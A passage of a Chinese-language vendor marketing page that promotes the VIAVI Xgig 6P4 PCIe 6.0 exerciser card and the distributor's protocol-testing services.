Card) 是一個全面整合的解決方案,驗證 (Exerciser) 的功能都整合在單一的 CEM 板卡機構中 VIAVI Xgig® 6P4 PCIe 驗證卡 (Exerciser Card) 提供了 1、2 和 4 通道鏈路寬度,支援深入的 64GT/s 測試和分析,同時支援 CXL和NVMe,可模擬來源端 (RC 或 Host) 或目的端 (EP 或 Device) 操作,具備高度可配置的連接方,實現對主機和端點設備的全面控制;6P4 支援 PCIe FLIT 模式和非 FLIT 模式的操作,並提供對狀態機的驗證和除錯;可編程產生非符合 PCIe 標準的資料序列,進行邊界和壓力條件的測試,有效解決協定通訊問題,提供系統性能除錯和分析。 了解更多 > 我們將持續更新 VIAVI PCIE 6.0 測試解決方案的最新資訊,請保持關注並追蹤我們的最新消息,以第一手資訊了解這一創新測試解決方案的最新發展,期待與您一同見證Xgig® 6P16 與 6P4 的正式登場;翔宇科技為 VIAVI Solutions – Platinum Partner – 最高等級的代理商,並於 2022 年獲頒 2022 年獲頒 VIAVI 2022 Velocity Partner Award,翔宇科技具有豐富客戶服務經驗,可提供客戶設備安裝及時問題排除、設置建議、基本協定說明、檢視可能問題等,再搭配 VIAVI 設備,可提供客戶快速找到問題與對應方案。 延伸閱讀 瀏覽 VIAVI Solutions 所有技術文章 > 匯流排協定測試解決方案總覽 > 翔宇科技代理了各種匯流排協定測試解決方案,包括:PCIe、NVMe、CXL、Serial Attached SCSI、Serial ATA、Fibre Channel、Ethernet、MIPI M-PHY、 UniPro、UFS、A-PHY、I3C、USB、CAN、I2C、SPI、eSPI 等測試工具。

bottom of page